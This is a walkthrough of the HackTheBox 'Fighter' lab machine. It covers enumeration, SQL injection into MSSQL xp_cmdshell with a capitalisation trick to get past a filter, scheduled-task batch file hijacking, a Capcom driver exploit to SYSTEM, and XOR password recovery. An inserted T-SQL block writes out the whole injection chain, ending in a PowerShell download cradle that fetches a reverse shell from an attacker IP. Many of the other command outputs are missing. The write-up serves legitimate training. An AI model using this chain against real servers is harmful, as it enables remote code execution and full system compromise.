Fighter
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 4000 10.129.228.121
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-08 12:58 +08
Nmap scan report for 10.129.228.121
Host is up (0.0095s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
With this, we can start proxying traffic through Burp.
Web Enumeration
Port 80 shows a Street Fighter themed page:

There's mention of a 'link' that we are supposed to know. Based on HTB trends, I added streetfighterclub.htb to the /etc/hosts file. Afterwards, I ran a gobuster directory scan and a wfuzz subdomain scan against the site.
Interestingly, the subdomain it turned up just returns a 403:

The error page identifies the server as Microsoft IIS. I still ran a gobuster scan on this new subdomain and found one directory:
From there, a recursive feroxbuster scan with the -x asp,html,aspx,php extensions turns up the hidden subdirectories:
We found a login page!
SQL Injection -> RCE
The login page looked like a good candidate for injection testing:

Here's the POST request being sent:
There was a logintype parameter, where 1 indicated Administrator and 2 indicated User. Adding a quote to it causes an Internal Server Error:

I tested this with some basic SQL injection and found that ;+--+- works (it URL-decodes to "; -- -": the semicolon ends the statement and the comment swallows whatever the application appends). Instead of an error, we are redirected to the Welcome.asp page.

So this login page was vulnerable to SQL injection. Testing it a bit further with UNION-based injection showed that the query returns 6 columns:
I attempted to write webshells onto the site and to run xp_cmdshell, since the backend was likely MSSQL. All of them returned 500s, except for the reconfiguration that enables xp_cmdshell and the execution of a ping command:
However, I got no ping back, so something on the web side was likely filtering the request. I searched for ways to obfuscate it, in case Defender or a similar filter was blocking us, and this site had a good one:
Just use XP_cmdshell instead of xp_cmdshell and the ping works. SQL Server resolves procedure names case-insensitively under its default collation, so a filter that only matches the lowercase spelling in front of the database is trivially bypassed:

Now we just need a reverse shell. Since something is obviously filtering commands on the machine, the usual nc.exe approach might not work. Oddly, running powershell.exe by name returns a 500, suggesting we have to use its full path.
The 64-bit PowerShell binary oddly doesn't work either. The 32-bit one in C:\Windows\SysWOW64 works properly:
The final query looks like this:
Note that the script must be named REV.PS1, since the request the box sends upper-cases the filename. Afterwards, we get a shell:
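The whole injection chain above, written out as the T-SQL the server ends up executing, as an added example and not a query from the original writeup. The shape of the backend login query, its table and column names, the attacker address 10.10.14.2 and the exact download cradle are assumptions; the page itself only shows the logintype parameter, the ;+--+- terminator, the xp_cmdshell reconfiguration, the XP_cmdshell casing trick, the SysWOW64 PowerShell path and the REV.PS1 filename.

```sql
-- Assumed shape of the backend login query (the page never shows it).
-- logintype is the injectable parameter: 1 = Administrator, 2 = User.
SELECT * FROM users WHERE username = 'admin' AND password = 'x' AND logintype = 1;

-- Step 1: the ";+--+-" probe from the page URL-decodes to "; -- -".
-- ";" ends the statement and "-- -" comments out whatever the
-- application appends, so the query succeeds and we land on Welcome.asp.
SELECT * FROM users WHERE username = 'admin' AND password = 'x' AND logintype = 1; -- -

-- Each statement below is delivered the same way, as
--   logintype=1;<statement>;+--+-
-- in the POST body (stacked queries, which MSSQL allows by default).

-- Step 2: enable xp_cmdshell. 'show advanced options' has to be switched
-- on first, otherwise the xp_cmdshell option cannot be set.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

-- Step 3: test command execution. The lowercase spelling was blocked in
-- front of the database, but under SQL Server's default case-insensitive
-- collation XP_cmdshell resolves to exactly the same procedure.
EXEC XP_cmdshell 'ping 10.10.14.2';   -- 10.10.14.2 is an assumed attacker IP

-- Step 4: fetch and run the reverse shell with the 32-bit PowerShell from
-- SysWOW64 (the 64-bit binary returned 500 on the box). Single quotes
-- inside a T-SQL string literal are doubled. The script name is REV.PS1,
-- in caps, because the outgoing request upper-cases the filename.
EXEC XP_cmdshell 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -c "IEX (New-Object Net.WebClient).DownloadString(''http://10.10.14.2/REV.PS1'')"';
```

Run steps 2 to 4 as three separate requests rather than one: sp_configure/RECONFIGURE must have taken effect before the first XP_cmdshell call, and keeping each payload short makes it easier to see which part a filter rejects with a 500.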

Privilege Escalation
Write Batch -> Decoder Shell
The box is a well patched machine:
There are 150+ hotfixes applied. There are other users on the machine too:
Interestingly, we can read the decoder user's home directory:
There's a batch file present that looks like it's part of a scheduled task, and we have Modify permissions on it:
Normally, I would append something to the end of the file and let the task execute it; however, there's an exit call before the end of the file, so anything appended after it would never run.
Appending isn't the only option, though. Modify covers write and delete on the file, so instead of adding to it we can replace its contents entirely, for example with copy.
Now we can write whatever we want to this file. We can echo it in from the same shell we used earlier:
After waiting for a while, we get a shell as decoder:

Driver Exploit -> SYSTEM
Basic enumeration shows that decoder has no special privileges on the machine. I couldn't run many scripts because AppLocker or Defender was present:
Based on the theme of the machine, I searched for exploits related to Street Fighter and, surprisingly, found an ExploitDB entry:
The Capcom driver is well known for granting SYSTEM shells, so let's take a look at that. There are loads of PoCs available. I used this one:
This one was the best fit because it is PowerShell-based rather than relying on .exe files, which I could not execute anyway. I struggled a bit with uploading the files onto the machine, but eventually followed 0xdf's writeup and combined them into a single file (which is really smart):
Then we can use a PowerShell download cradle to import it in memory:
Then, run the exploit:

Root.exe + DLL RE -> Flag
There was no root.txt flag on the Administrator's desktop. Instead, there was an .exe file with a .dll library beside it.
root.exe requires a password:
We can bring both files back to our machine and reverse engineer them to find that password. The files weren't large, so I base64-encoded them and copied the output back to my machine:
Afterwards, I opened both in Ghidra. root.exe has a function FUN_00401000 that does some character manipulation:

checkdll.dll has a function that XORs bytes with 9.

The global variable it reads can be found by clicking on it:

The encoding is easily reversed by XORing each byte with 9 and converting the result back to characters.
That gives us the password, which we pipe through xxd to turn it into printable characters:
Then, we can get the flag: